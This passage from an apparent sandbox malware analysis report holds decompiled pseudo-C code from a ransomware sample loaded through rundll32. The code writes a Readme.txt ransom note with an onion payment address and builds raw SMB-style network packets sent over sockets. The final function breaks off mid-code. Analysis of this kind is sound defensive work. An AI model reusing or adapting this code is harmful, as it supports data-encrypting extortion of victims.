                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,74714F20,00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04A43089
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43092
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000003F,74715520,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A430A4
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A430A7
                                                                                                          • htons.WS2_32(0000003B), ref: 04A430BF
                                                                                                          • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 04A430F7
                                                                                                          • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 04A4310D
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43127
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A4312E
                                                                                                          • memcpy.MSVCRT ref: 04A43144
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43153
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A4315A
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43165
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A4316C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 317911368-636472023
                                                                                                          • Opcode ID: d3314f3714166181427b8a983a2deaaaef7185696769b1bca13ff6867fe005e4
                                                                                                          • Instruction ID: f21a166f031487521f0e345f116e40808b7153293ec758a18e10bb0f4332cc7b
                                                                                                          • Opcode Fuzzy Hash: d3314f3714166181427b8a983a2deaaaef7185696769b1bca13ff6867fe005e4
                                                                                                          • Instruction Fuzzy Hash: CD318D75600345BBEF115FA8DC49FAE7B69EFD8300F144459FA049B280DB769801CB24
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A460F9(struct _OVERLAPPED* _a4) {
                                                                                                          				long _v8;
                                                                                                          				short _v528;
                                                                                                          				short _v2088;
                                                                                                          				void _v10280;
                                                                                                          				signed int _t35;
                                                                                                          				intOrPtr* _t54;
                                                                                                          				void* _t63;
                                                                                                          				void* _t65;
                                                                                                          				intOrPtr _t67;
                                                                                                          				intOrPtr* _t71;
                                                                                                          
                                                                                                          				E04A4A760(0x2824);
                                                                                                          				wsprintfW( &_v528, L"%s", L"Readme.txt");
                                                                                                          				_t71 = _a4;
                                                                                                          				if(PathCombineW( &_v2088, _t71 + 4,  &_v528) != 0) {
                                                                                                          					_t35 = E04A46477();
                                                                                                          					if(_t35 != 0) {
                                                                                                          						if(_t35 > 1) {
                                                                                                          							_t35 = _t35 - 1;
                                                                                                          						}
                                                                                                          						if(WaitForMultipleObjects((0 |  *((intOrPtr*)(_t71 + 0x4c)) != 0x00000000) + 1, _t71 + 0x48, 0, _t35 * 0xea60) != 0) {
                                                                                                          							_t63 = CreateFileW( &_v2088, 0x40000000, 0, 0, 1, 0, 0);
                                                                                                          							if(_t63 != 0xffffffff) {
                                                                                                          								_a4 = 0;
                                                                                                          								if(E04A457E5( *((intOrPtr*)(_t71 + 0x38)),  *_t71, _t71 + 0xc,  &_a4) != 0) {
                                                                                                          									memset( &_v10280, 0, 0x1000);
                                                                                                          									StrCatW( &_v10280, L"Oops! Your files have been encrypted.\r\n\r\nIf you see this text, your files are no longer accessible.\r\nYou might have been looking for a way to recover your files.\r\nDon\'t waste your time. No one will be able to recover them without our\r\ndecryption service.\r\n\r\nWe  guarantee that you can recover all your files safely. All you\r\nneed to do is submit the payment and get the decryption password.\r\n\r\nVisit our web service at caforssztxqzf2nm.onion\r\n\r\nYour personal installation key#2:\r\n\r\n");
                                                                                                          									StrCatW( &_v10280, _a4);
                                                                                                          									_t54 =  &_v10280;
                                                                                                          									_v8 = 0;
                                                                                                          									_t65 = _t54 + 2;
                                                                                                          									do {
                                                                                                          										_t67 =  *_t54;
                                                                                                          										_t54 = _t54 + 2;
                                                                                                          									} while (_t67 != 0);
                                                                                                          									if(WriteFile(_t63,  &_v10280, (_t54 - _t65 >> 1) + (_t54 - _t65 >> 1),  &_v8, 0) != 0) {
                                                                                                          										FlushFileBuffers(_t63);
                                                                                                          									}
                                                                                                          									LocalFree(_a4);
                                                                                                          								}
                                                                                                          								CloseHandle(_t63);
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return 1;
                                                                                                          			}













                                                                                                          0x04a46101
                                                                                                          0x04a46118
                                                                                                          0x04a4611e
                                                                                                          0x04a4613e
                                                                                                          0x04a46145
                                                                                                          0x04a4614e
                                                                                                          0x04a46157
                                                                                                          0x04a46159
                                                                                                          0x04a46159
                                                                                                          0x04a46178
                                                                                                          0x04a46197
                                                                                                          0x04a4619c
                                                                                                          0x04a461ac
                                                                                                          0x04a461b9
                                                                                                          0x04a461c8
                                                                                                          0x04a461e2
                                                                                                          0x04a461ee
                                                                                                          0x04a461f0
                                                                                                          0x04a461f6
                                                                                                          0x04a461f9
                                                                                                          0x04a461fc
                                                                                                          0x04a461fc
                                                                                                          0x04a461ff
                                                                                                          0x04a46202
                                                                                                          0x04a46223
                                                                                                          0x04a46226
                                                                                                          0x04a46226
                                                                                                          0x04a4622f
                                                                                                          0x04a4622f
                                                                                                          0x04a46236
                                                                                                          0x04a46236
                                                                                                          0x04a4623c
                                                                                                          0x04a46178
                                                                                                          0x04a4623d
                                                                                                          0x04a46243

                                                                                                          APIs
                                                                                                          • wsprintfW.USER32 ref: 04A46118
                                                                                                          • PathCombineW.SHLWAPI(?,?,?), ref: 04A46136
                                                                                                            • Part of subcall function 04A46477: GetTickCount.KERNEL32 ref: 04A46477
                                                                                                          • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04A46170
                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 04A46191
                                                                                                          • memset.MSVCRT ref: 04A461C8
                                                                                                          • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 04A461E2
                                                                                                          • StrCatW.SHLWAPI(?,?), ref: 04A461EE
                                                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04A4621B
                                                                                                          • FlushFileBuffers.KERNEL32(00000000), ref: 04A46226
                                                                                                          • LocalFree.KERNEL32(?), ref: 04A4622F
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 04A46236
                                                                                                          Strings
                                                                                                          • Readme.txt, xrefs: 04A46107
                                                                                                          • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 04A461D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                                                                                          • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt
                                                                                                          • API String ID: 1343258794-115798760
                                                                                                          • Opcode ID: 5776f29cde3672a8efdc621f9eb07c9ae2347854cead44945dea595323fc1fad
                                                                                                          • Instruction ID: cfd7906d4a2e4fcafc30de03c30e721d2a55ab98f908775204a63f1a37685909
                                                                                                          • Opcode Fuzzy Hash: 5776f29cde3672a8efdc621f9eb07c9ae2347854cead44945dea595323fc1fad
                                                                                                          • Instruction Fuzzy Hash: 733152B6900108BBDB219F64DD48D9F7BFCEBD9700B044565F906D6440DA3AFA45CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 71%
                                                                                                          			E04A42F5A(intOrPtr _a4, void* _a8, short _a12, intOrPtr _a16, intOrPtr _a20, short _a24, void* _a28, signed int _a32) {
                                                                                                          				char _v5;
                                                                                                          				int _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _t36;
                                                                                                          				signed int _t38;
                                                                                                          				short _t45;
                                                                                                          				signed short _t50;
                                                                                                          				void* _t53;
                                                                                                          				void* _t57;
                                                                                                          				signed int _t59;
                                                                                                          				short _t61;
                                                                                                          				void* _t70;
                                                                                                          				void* _t71;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t36 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v16 = _t36;
                                                                                                          				if(_t36 != 0) {
                                                                                                          					_t38 = _a32 & 0x0000ffff;
                                                                                                          					_v12 = _t38;
                                                                                                          					_t57 = HeapAlloc(GetProcessHeap(), 8, _t38 + 0x40);
                                                                                                          					if(_t57 != 0) {
                                                                                                          						_t59 = 9;
                                                                                                          						memcpy(_t57, _a8, _t59 << 2);
                                                                                                          						_t70 = _v12 + 0x40;
                                                                                                          						_t45 = _t70 - 4;
                                                                                                          						__imp__#9(_t45);
                                                                                                          						 *((short*)(_t57 + 2)) = _t45;
                                                                                                          						 *((short*)(_t57 + 0x29)) = _a12;
                                                                                                          						 *((intOrPtr*)(_t57 + 0x2b)) = _a16;
                                                                                                          						 *((intOrPtr*)(_t57 + 0x2f)) = _a20;
                                                                                                          						 *((short*)(_t57 + 0x33)) = _a24;
                                                                                                          						_t50 = _a32;
                                                                                                          						_t61 = 0x3c;
                                                                                                          						 *(_t57 + 0x35) = _t50;
                                                                                                          						 *(_t57 + 0x39) = _t50;
                                                                                                          						 *((short*)(_t57 + 0x3d)) = _t50 + 1;
                                                                                                          						_t24 = _t57 + 0x40; // 0x40
                                                                                                          						 *((char*)(_t57 + 8)) = 0x2f;
                                                                                                          						 *((short*)(_t57 + 0x24)) = 0xff0c;
                                                                                                          						 *((short*)(_t57 + 0x3b)) = _t61;
                                                                                                          						_t53 = memcpy(_t24, _a28, _v12);
                                                                                                          						__imp__#19(_a4, _t57, _t70, 0);
                                                                                                          						if(_t53 > 0) {
                                                                                                          							_t71 = _v16;
                                                                                                          							__imp__#16(_a4, _t71, 0xffff, 0);
                                                                                                          							if(_t53 > 0 &&  *((intOrPtr*)(_t71 + 9)) == 0) {
                                                                                                          								_v5 = 1;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}
















                                                                                                          0x04a42f6f
                                                                                                          0x04a42f7c
                                                                                                          0x04a42f7e
                                                                                                          0x04a42f83
                                                                                                          0x04a42f89
                                                                                                          0x04a42f8e
                                                                                                          0x04a42f9c
                                                                                                          0x04a42fa0
                                                                                                          0x04a42fab
                                                                                                          0x04a42fae
                                                                                                          0x04a42fb3
                                                                                                          0x04a42fb6
                                                                                                          0x04a42fba
                                                                                                          0x04a42fc0
                                                                                                          0x04a42fc8
                                                                                                          0x04a42fcf
                                                                                                          0x04a42fd5
                                                                                                          0x04a42fde
                                                                                                          0x04a42fe2
                                                                                                          0x04a42fe5
                                                                                                          0x04a42fe9
                                                                                                          0x04a42ff0
                                                                                                          0x04a42ff5
                                                                                                          0x04a42ff9
                                                                                                          0x04a42ffd
                                                                                                          0x04a43001
                                                                                                          0x04a43007
                                                                                                          0x04a4300b
                                                                                                          0x04a4301b
                                                                                                          0x04a43023
                                                                                                          0x04a43025
                                                                                                          0x04a43032
                                                                                                          0x04a4303a
                                                                                                          0x04a43041
                                                                                                          0x04a43041
                                                                                                          0x04a4303a
                                                                                                          0x04a4304f
                                                                                                          0x04a4304f
                                                                                                          0x04a43061
                                                                                                          0x04a43067
                                                                                                          0x04a4306e

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04A42F73
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A42F7C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,761DC2E0), ref: 04A42F97
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A42F9A
                                                                                                          • htons.WS2_32(424D53FE), ref: 04A42FBA
                                                                                                          • memcpy.MSVCRT ref: 04A4300B
                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04A4301B
                                                                                                          • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A43032
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A43048
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4304F
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A4305A
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A43061
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 2433318192-636472023
                                                                                                          • Opcode ID: 00850c7041f8904391eaad6fffa9e29941abd7a152e34a1fe76ad5d57bcb2fe2
                                                                                                          • Instruction ID: 084bdf0f8af65dbf92da551706585a394cbf63b9e334c519a23d88131bca1b87
                                                                                                          • Opcode Fuzzy Hash: 00850c7041f8904391eaad6fffa9e29941abd7a152e34a1fe76ad5d57bcb2fe2
                                                                                                          • Instruction Fuzzy Hash: 6D31BE79A00345ABEF109FA5D888A9E7BB8FFD8700F054069FD08EB241D77AD905CB24
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 68%
                                                                                                          			E04A432AF(intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                          				signed short _v8;
                                                                                                          				void* _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				void* _t27;
                                                                                                          				long _t30;
                                                                                                          				void* _t37;
                                                                                                          				int _t40;
                                                                                                          				signed int _t43;
                                                                                                          				void* _t48;
                                                                                                          				signed int _t50;
                                                                                                          				void* _t64;
                                                                                                          
                                                                                                          				_v16 = 0xbadf00d;
                                                                                                          				_t27 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v12 = _t27;
                                                                                                          				if(_t27 != 0) {
                                                                                                          					_t30 = (_a24 & 0x0000ffff) + 0x4d;
                                                                                                          					_v8 = _t30;
                                                                                                          					_t48 = HeapAlloc(GetProcessHeap(), 8, _t30);
                                                                                                          					if(_t48 != 0) {
                                                                                                          						_t50 = 9;
                                                                                                          						_t37 = memcpy(_t48, _a8, _t50 << 2);
                                                                                                          						__imp__#9(_v8 + 0xfffffffc);
                                                                                                          						 *(_t48 + 2) = _t37;
                                                                                                          						 *((short*)(_t48 + 0x22)) = _a12;
                                                                                                          						 *((char*)(_t48 + 8)) = 0xa0;
                                                                                                          						_t14 = _t48 + 0x24; // 0x24
                                                                                                          						_t40 = memcpy(_t14, _a16, 0 << 2);
                                                                                                          						_t17 = _t48 + 0x4d; // 0x4d
                                                                                                          						asm("movsb");
                                                                                                          						memcpy(_t17, _a20, _t40);
                                                                                                          						_t43 = _v8 & 0x0000ffff;
                                                                                                          						__imp__#19(_a4, _t48, _t43, 0, 0xa);
                                                                                                          						if(_t43 > 0) {
                                                                                                          							_t64 = _v12;
                                                                                                          							__imp__#16(_a4, _t64, 0xffff, 0);
                                                                                                          							if(_t43 > 0) {
                                                                                                          								_v16 =  *((intOrPtr*)(_t64 + 9));
                                                                                                          							}
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t48);
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          				}
                                                                                                          				return _v16;
                                                                                                          			}














                                                                                                          0x04a432c4
                                                                                                          0x04a432d4
                                                                                                          0x04a432d6
                                                                                                          0x04a432db
                                                                                                          0x04a432e6
                                                                                                          0x04a432ec
                                                                                                          0x04a432f4
                                                                                                          0x04a432f8
                                                                                                          0x04a43306
                                                                                                          0x04a4330d
                                                                                                          0x04a4330f
                                                                                                          0x04a43318
                                                                                                          0x04a43322
                                                                                                          0x04a4332b
                                                                                                          0x04a4332f
                                                                                                          0x04a43332
                                                                                                          0x04a43338
                                                                                                          0x04a4333c
                                                                                                          0x04a4333d
                                                                                                          0x04a43342
                                                                                                          0x04a43350
                                                                                                          0x04a43358
                                                                                                          0x04a4335a
                                                                                                          0x04a43368
                                                                                                          0x04a43370
                                                                                                          0x04a43375
                                                                                                          0x04a43375
                                                                                                          0x04a43370
                                                                                                          0x04a43382
                                                                                                          0x04a43382
                                                                                                          0x04a43394
                                                                                                          0x04a4339a
                                                                                                          0x04a433a1

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 04A432CB
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A432D4
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,74714F20), ref: 04A432EF
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A432F2
                                                                                                          • htons.WS2_32(?), ref: 04A4330F
                                                                                                          • memcpy.MSVCRT ref: 04A4333D
                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04A43350
                                                                                                          • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A43368
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A4337B
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A43382
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A4338D
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A43394
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 2433318192-636472023
                                                                                                          • Opcode ID: a0b9b6878e8ad6c01556cddd214713304f51c3835fb3c4a1ba88404a83c05f12
                                                                                                          • Instruction ID: 35a52d2f848c61a4d2084ecf3fa5e13e429f171594d6ef146d3674dc321ce388
                                                                                                          • Opcode Fuzzy Hash: a0b9b6878e8ad6c01556cddd214713304f51c3835fb3c4a1ba88404a83c05f12
                                                                                                          • Instruction Fuzzy Hash: E3317F75A0020ABBEF009FA59C45AAE7BA8EFC9710F048455FD00EB281DB79ED05CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 62%
                                                                                                          			E04A441E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, signed short _a12, intOrPtr* _a16) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				signed int _v16;
                                                                                                          				void* _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				intOrPtr _v32;
                                                                                                          				void _v36;
                                                                                                          				void* __ebx;
                                                                                                          				signed int _t178;
                                                                                                          				intOrPtr _t182;
                                                                                                          				void* _t190;
                                                                                                          				int _t193;
                                                                                                          				void* _t196;
                                                                                                          				intOrPtr _t211;
                                                                                                          				intOrPtr _t212;
                                                                                                          				intOrPtr _t214;
                                                                                                          				intOrPtr _t215;
                                                                                                          				intOrPtr _t218;
                                                                                                          				intOrPtr _t219;
                                                                                                          				intOrPtr _t220;
                                                                                                          				void* _t227;
                                                                                                          				void _t231;
                                                                                                          				intOrPtr _t234;
                                                                                                          				intOrPtr _t235;
                                                                                                          				intOrPtr _t238;
                                                                                                          				intOrPtr _t240;
                                                                                                          				intOrPtr _t241;
                                                                                                          				intOrPtr _t243;
                                                                                                          				intOrPtr _t244;
                                                                                                          				intOrPtr _t245;
                                                                                                          				void* _t247;
                                                                                                          				signed short _t249;
                                                                                                          				signed int _t251;
                                                                                                          				intOrPtr _t254;
                                                                                                          				signed int _t255;
                                                                                                          				signed short _t257;
                                                                                                          				void* _t258;
                                                                                                          				void* _t261;
                                                                                                          				void* _t262;
                                                                                                          				void* _t264;
                                                                                                          				void* _t265;
                                                                                                          				void* _t266;
                                                                                                          				void* _t268;
                                                                                                          				intOrPtr* _t277;
                                                                                                          				void* _t278;
                                                                                                          				intOrPtr* _t279;
                                                                                                          				void* _t303;
                                                                                                          				signed short _t305;
                                                                                                          
                                                                                                          				_t268 = __edx;
                                                                                                          				_t247 = __ecx;
                                                                                                          				_v5 = 0;
                                                                                                          				_t303 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                          				_v12 = _t303;
                                                                                                          				if(_t303 == 0) {
                                                                                                          					L36:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t277 = _a16;
                                                                                                          				 *((char*)(_t303 + 2)) = 1;
                                                                                                          				asm("cdq");
                                                                                                          				asm("adc edx, [ebx+0x14]");
                                                                                                          				if(E04A440E3( *_t277, _t247, _a4,  *_a8, ( *( *_t277 + 0x5d) & 0x000000ff) +  *((intOrPtr*)( *_t277 + 0x10)), _t268, _t303, 2) == 0) {
                                                                                                          					L35:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t303);
                                                                                                          					goto L36;
                                                                                                          				}
                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                          				if(E04A43D0D(_t247, _t268, _a4, _a8, _a12,  *((intOrPtr*)( *_t277 + 0x10)),  *((intOrPtr*)( *_t277 + 0x14)),  &_v16, 0x100, _t277) == 0) {
                                                                                                          					goto L35;
                                                                                                          				}
                                                                                                          				_t178 =  *( *_t277 + 0x5c) & 0x000000ff;
                                                                                                          				_t248 = _v16;
                                                                                                          				_t231 =  *(_t248 + _t178);
                                                                                                          				_v24 =  *((intOrPtr*)(_t178 + _t248 + 4));
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                          				_t182 =  *_t277;
                                                                                                          				if( *((char*)(_t182 + 0x66)) == 0) {
                                                                                                          					_t249 =  *(_t182 + 0x64) & 0x000000ff;
                                                                                                          					_a12 = _t249;
                                                                                                          					if(0 >= _t249) {
                                                                                                          						L40:
                                                                                                          						if(E04A440E3(_t182, _a8, _a4,  *_a8, _t231, _v24, _t303, _a12) != 0) {
                                                                                                          							_v5 = 1;
                                                                                                          						}
                                                                                                          						goto L35;
                                                                                                          					}
                                                                                                          					_t278 = 0;
                                                                                                          					_t251 = _t249 & 0x0000ffff;
                                                                                                          					do {
                                                                                                          						 *(_t278 + _t303 + 1) =  !( *(_t278 +  *((intOrPtr*)(_t182 + 0x60))));
                                                                                                          						_t278 = _t278 + 1;
                                                                                                          						_t251 = _t251 - 1;
                                                                                                          					} while (_t251 != 0);
                                                                                                          					goto L40;
                                                                                                          				} else {
                                                                                                          					_t184 =  *((intOrPtr*)(_t182 + 0x65));
                                                                                                          					if( *((intOrPtr*)(_t182 + 0x65)) != 0) {
                                                                                                          						asm("cdq");
                                                                                                          						asm("adc edx, [ebp-0x14]");
                                                                                                          						_t248 =  &_v16;
                                                                                                          						if(E04A43D0D( &_v16, _t268, _a4, _a8, _a12, (_t184 & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                          							_t231 = 0;
                                                                                                          							_v24 = 0;
                                                                                                          						} else {
                                                                                                          							_t227 = _v16;
                                                                                                          							_t248 =  *(_t227 + 4);
                                                                                                          							_t231 =  *_t227;
                                                                                                          							_v24 =  *(_t227 + 4);
                                                                                                          							HeapFree(GetProcessHeap(), 8, _t227);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					if(_t231 != 0 || _v24 != _t231) {
                                                                                                          						asm("cdq");
                                                                                                          						asm("adc edx, [ebp-0x14]");
                                                                                                          						if(E04A43D0D(_t248, _t268, _a4, _a8, _a12, ( *( *_t277 + 0x66) & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                          							goto L35;
                                                                                                          						}
                                                                                                          						_t190 = _v16;
                                                                                                          						_t233 =  *_t190;
                                                                                                          						_v36 =  *_t190;
                                                                                                          						_v32 =  *((intOrPtr*)(_t190 + 4));
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t190);
                                                                                                          						_t253 =  *_t277;
                                                                                                          						_t193 = 0x100;
                                                                                                          						if(0 ==  *((intOrPtr*)( *_t277))) {
                                                                                                          							_t193 = 0x200;
                                                                                                          						}
                                                                                                          						if(E04A43D0D(_t253, 0, _a4, _a8, _a12, _t233, _v32,  &_v16, _t193, _t277) == 0) {
                                                                                                          							goto L35;
                                                                                                          						} else {
                                                                                                          							_t254 =  *_t277;
                                                                                                          							_t196 = _v16;
                                                                                                          							_t255 =  *(_t254 + 0x68) & 0x000000ff;
                                                                                                          							_t234 =  *((intOrPtr*)(_t196 + _t255));
                                                                                                          							_a12 =  *(_t196 + ( *(_t254 + 0x67) & 0x000000ff));
                                                                                                          							_v28 = _t234;
                                                                                                          							_v24 =  *((intOrPtr*)(_t255 + _t196 + 4));
                                                                                                          							HeapFree(GetProcessHeap(), 8, _t196);
                                                                                                          							memset(_t303, 0, 0x100);
                                                                                                          							if(_a12 == 0) {
                                                                                                          								goto L35;
                                                                                                          							}
                                                                                                          							_t279 =  *_t277;
                                                                                                          							_t257 = _a12;
                                                                                                          							_v16 = _t279;
                                                                                                          							if(1 !=  *_t279) {
                                                                                                          								_t258 = _t257 - 1;
                                                                                                          								if(_t258 == 0) {
                                                                                                          									_a12 = 1;
                                                                                                          									_t235 = _t234 + 0x10;
                                                                                                          									asm("adc eax, edx");
                                                                                                          									 *(_t303 + 5) = _v24;
                                                                                                          									_push(0x1c);
                                                                                                          									L30:
                                                                                                          									 *((intOrPtr*)(_t303 + 1)) = _t235;
                                                                                                          									L31:
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									_pop(_t305);
                                                                                                          									_t281 = _a8;
                                                                                                          									_t260 = _a12;
                                                                                                          									 *((_t305 & 0x0000ffff) + _v12 + 1 + 4) = _a12;
                                                                                                          									asm("cdq");
                                                                                                          									asm("adc edx, [ebp-0x1c]");
